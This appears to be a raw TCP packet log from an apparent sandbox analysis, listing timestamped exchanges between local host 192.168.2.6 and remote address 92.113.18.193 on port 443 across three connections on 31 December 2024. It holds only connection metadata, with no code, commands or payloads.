                                          Dec 31, 2024 10:38:03.731225014 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.731256962 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.731273890 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.745364904 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.745413065 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.745436907 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.745445013 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.745492935 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.759767056 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.759814024 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.759844065 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.759851933 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.759885073 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.759903908 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.764422894 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.764473915 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.773967028 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.774035931 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.774055004 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.774061918 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.774116039 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.790292978 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.790345907 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.790366888 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.790374041 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.790399075 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.790431023 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.804593086 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.804641962 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.804670095 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.804677010 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.804719925 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.818932056 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.818980932 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.819010019 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.819021940 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.819051981 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.819065094 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.862008095 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.862086058 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.862101078 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.862128019 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.862181902 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.877226114 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.877269030 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.877314091 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.877329111 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.877350092 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.877432108 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.877458096 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.877496958 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.877516985 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.877521992 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.877551079 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.877568007 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.877690077 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.877727032 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.877752066 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.877756119 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.877787113 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.877801895 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.877914906 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.877953053 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.877976894 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.877981901 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.878026962 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.878050089 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.878110886 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.878159046 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.878174067 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.878179073 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.878218889 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.878236055 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.878256083 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.878293991 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.878324032 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.878328085 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.878356934 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.878379107 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.878407001 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.878443956 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.878468037 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.878473043 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.878508091 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.878525019 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.878695011 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.878745079 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.878750086 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.878813028 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.878829956 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.878860950 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.879733086 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.879745960 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:06.185952902 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:06.186007977 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:06.186088085 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:06.193608046 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:06.193644047 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:06.835220098 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:06.835295916 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:06.836924076 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:06.836944103 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:06.837196112 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:06.843753099 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:06.887329102 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.158720970 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.204159021 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.310697079 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.310710907 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.310765982 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.310833931 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.310863018 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.310863018 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.310889006 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.310920954 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.310959101 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.312606096 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.312623978 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.312786102 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.312798977 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.312870979 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.422097921 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.422121048 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.422202110 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.422202110 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.422231913 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.422485113 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.423039913 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.423094988 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.423108101 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.423108101 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.423201084 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.426947117 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.703280926 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.703321934 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.703603029 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.703603029 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.703636885 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.352049112 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.353930950 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.353951931 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.665513039 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.719790936 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.755321980 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.755337954 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.755354881 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.755361080 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.755392075 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.755412102 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.755429983 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.755450010 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.755484104 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.756899118 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.756917000 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.756978035 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.756997108 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.757041931 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.845316887 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.845339060 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.845398903 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.845418930 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.845514059 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.846777916 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.846793890 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.846828938 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.846837044 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.846884966 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.847764969 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.847780943 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.847826004 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.847834110 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.847870111 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.847892046 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.849462986 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.849478006 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.849559069 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.849565983 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.849627972 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.935771942 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.935794115 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.935836077 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.935844898 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.935882092 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.935910940 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.937143087 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.937161922 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.937200069 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.937207937 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.937243938 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.937252998 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.937814951 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.937829971 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.937880039 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.937886953 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.937956095 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.938570023 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.938585043 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.938648939 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.938657999 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.938791037 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.939553022 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.939568996 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.939642906 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.939651012 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.939749956 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.941243887 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.941260099 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.941308975 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.941318989 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.941720963 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.024306059 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.024328947 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.024375916 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.024389029 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.024415016 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.024441957 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.026742935 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.026757002 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.026793957 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.026803017 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.026829004 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.026850939 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.027396917 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.027410984 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.027456999 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.027465105 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.027491093 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.027699947 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.028983116 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.029001951 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.029045105 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.029051065 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.029061079 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.029191017 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.029263020 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.029284000 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.029310942 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.029319048 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.029335976 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.029360056 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.029709101 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.029722929 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.029773951 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.029782057 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.030097961 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.030119896 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.030137062 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.030143976 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.030181885 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.030215979 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.030553102 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.030566931 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.030617952 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.030626059 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.030702114 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.114804029 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.114829063 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.114877939 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.114888906 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.114927053 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.114954948 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.117611885 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.117634058 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.117686033 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.117692947 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.117728949 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.117760897 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.117897987 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.117913008 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.117948055 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.117954969 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.117976904 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.118051052 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.118225098 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.118240118 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.118288040 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.118294001 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.118308067 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.118341923 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.118346930 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.118815899 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.118839979 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.118868113 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.118875027 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.118901014 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.118915081 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.118938923 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.118978024 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.118987083 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.118993044 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.119029999 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.119060993 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.119076014 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.119112968 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.119119883 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.119126081 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.119242907 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.119242907 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.119256020 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.119292974 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.119302034 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.119360924 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.205280066 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.205307961 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.205363035 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.205387115 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.205415010 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.205435038 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.207881927 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.207896948 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.207948923 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.207957983 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.207999945 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.208020926 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.209697008 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.209712029 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.209750891 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.209758043 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.209796906 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.209810972 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.211325884 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.211340904 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.211379051 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.211386919 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.211416006 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.211437941 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.212136984 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.212163925 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.212198019 CET49743443192.168.2.692.113.18.193
